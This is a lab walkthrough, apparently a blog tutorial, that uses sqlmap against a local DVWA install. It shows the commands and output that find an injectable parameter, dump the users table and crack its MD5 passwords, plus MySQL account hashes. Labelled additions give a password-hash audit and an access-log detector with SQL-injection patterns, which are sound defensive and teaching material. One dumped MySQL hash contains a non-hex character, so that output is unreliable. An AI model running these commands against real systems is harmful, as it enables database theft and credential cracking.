DVWA (Damn Vulnerable Web Application) is a deliberately vulnerable web application written in PHP and MySQL, built for teaching and testing common web vulnerabilities. It includes SQL injection, XSS, blind SQL injection and other common security flaws.
sqlmap is an automated SQL injection tool; its main job is to scan a given URL, find SQL injection vulnerabilities and exploit them. It supports many database back ends.
So with one as the spear and the other as the shield, this is a good chance to get a feel for SQL injection.
Installing DVWA is not covered in detail here; it needs PHP, Apache and MySQL.
sqlmap is open source, needs no installation, and can be found on GitHub.
Here are the steps:
I. Finding the injection point
1. Open Wireshark and capture on the lo interface (the target is the local machine).
2. On DVWA's SQL Injection page there is a User ID input box; enter anything and click Submit.
3. In Wireshark, find the GET request; it contains the Request URI and the Cookie header.
4. Use sqlmap to find the injection point:
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3"
The output shows that the likely injection point is the id parameter and the database is MySQL:
[INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
II. Dumping the database
1. Query the current database name:
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --current-db
This returns the current database name:
current database: 'dvwa'
2. List the tables in the dvwa database:
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --current-db --tables -Ddvwa
This returns the table names of the dvwa database:
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
3. Enumerate the columns of a table:
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" -T guestbook --columns
This returns the structure of the guestbook table:
Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| comment    | varchar(300)         |
| comment_id | smallint(5) unsigned |
| name       | varchar(100)         |
+------------+----------------------+
The structure of the users table, obtained the same way:
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+
4. Dump the contents of the users table:
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" -T users --dump
This returns the rows of the users table:
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+----------------------------------+-----------+------------+
| user_id | user    | avatar                          | password                         | last_name | first_name |
+---------+---------+---------------------------------+----------------------------------+-----------+------------+
| 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 | admin     | admin      |
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown     | Gordon     |
| 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b | Me        | Hack       |
| 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso   | Pablo      |
| 5       | smithy  | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith     | Bob        |
+---------+---------+---------------------------------+----------------------------------+-----------+------------+
5. Run the same command as in step 4; when sqlmap asks whether to crack the password hashes, answer yes. sqlmap then uses its own dictionary to crack them and recovers the passwords of all 5 users:
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                          | password                                    | last_name | first_name |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
6. At this point DVWA's SQL Injection task is complete.
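The dumped password column above holds unsalted MD5 hashes, which is why sqlmap's dictionary recovers them and why admin and smithy, who both use "password", show the identical hash. The following Python is an added example, not part of the original post or of DVWA: it audits the dump's hashes against a small constructed wordlist, flags users who share a hash, and contrasts this with salted PBKDF2 storage.

```python
import hashlib
import hmac
import os

# Hashes exactly as they appear in the dvwa.users dump above.
DUMPED_HASHES = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}
# Constructed mini wordlist standing in for sqlmap's built-in dictionary.
WORDLIST = ["123456", "password", "abc123", "letmein", "charley", "qwerty"]

def is_unsalted_md5(stored):
    """Audit heuristic: 32 hex chars with no salt or algorithm prefix."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower())

def wordlist_audit(hashes, words):
    """Map each user to the wordlist entry whose MD5 equals the stored hash (None if no hit)."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in words}
    return {user: table.get(h) for user, h in hashes.items()}

def duplicate_hash_users(hashes):
    """Users sharing a hash: without a salt, equal hashes reveal equal passwords."""
    by_hash = {}
    for user, h in hashes.items():
        by_hash.setdefault(h, []).append(user)
    return sorted(sorted(users) for users in by_hash.values() if len(users) > 1)

# Hardened storage for comparison: per-user random salt plus a slow KDF, so equal
# passwords produce different records and a wordlist has to be rerun per user.
def hash_password(password, iterations=600_000):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```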
DVWA's SQL Injection (Blind) task is done the same way; when first searching for the injection point, sqlmap reports that id is a blind injection point:
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3"
The output identifies id as an 'AND boolean-based blind - WHERE or HAVING clause' injection point:
[INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Surname: admin")
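Both findings above (the UNION query on /vulnerabilities/sqli/ and the boolean-based blind probe on /vulnerabilities/sqli_blind/) leave recognisable traces in the web server's access log. The Python below is an added example, not from the original post or from sqlmap: it parses Apache combined-format lines and flags requests whose id parameter carries such probes. The log lines and the sqlmap User-Agent string are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Apache combined log format; only the fields the detection needs are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Fingerprints of the two techniques sqlmap reported against DVWA's 'id'
# parameter: UNION query with NULL column probing, and AND boolean-based blind.
SQLI_MARKERS = re.compile(
    r"(union\s+(all\s+)?select|\bnull\s*,\s*null\b|\band\s+\d+\s*=\s*\d+|'|--|#|/\*)",
    re.IGNORECASE,
)

def suspicious_params(target):
    """Return {param: decoded value} for query parameters that look like SQLi probes."""
    query = parse_qs(urlparse(target).query, keep_blank_values=True)  # percent-decodes values
    return {name: v for name, values in query.items()
            for v in values if SQLI_MARKERS.search(v)}

def scan_log(lines):
    """Yield (client ip, parameter, decoded value, user agent) for each flagged request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "/vulnerabilities/sqli" not in m["target"]:
            continue
        for name, value in suspicious_params(m["target"]).items():
            yield m["ip"], name, value, m["ua"]

def summarize(lines):
    """Count flagged requests per (client ip, user agent) for alerting."""
    return Counter((ip, ua) for ip, _, _, ua in scan_log(lines))

# Constructed sample lines (not a real capture): one normal request, then two probes.
SAMPLE_LOG = [
    '127.0.0.1 - - [12/Aug/2014:14:05:01 +0800] "GET /DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [12/Aug/2014:14:05:09 +0800] "GET /DVWA-1.0.8/vulnerabilities/sqli/?id=2%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&Submit=Submit HTTP/1.1" 200 4400 "-" "sqlmap/1.0-dev"',
    '127.0.0.1 - - [12/Aug/2014:14:05:10 +0800] "GET /DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.0-dev"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(summarize(SAMPLE_LOG))
```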
./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --passwords
With its built-in dictionary, sqlmap can also crack the passwords of the database users themselves:
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *C76DD9894107EB85B2E15ADD4DDA15G7E3C6E98F
[*] root [1]:
password hash: *3800D13EE725ED411CBC3F23B2A2E19C64CE0BEC
clear-text password: passwordABC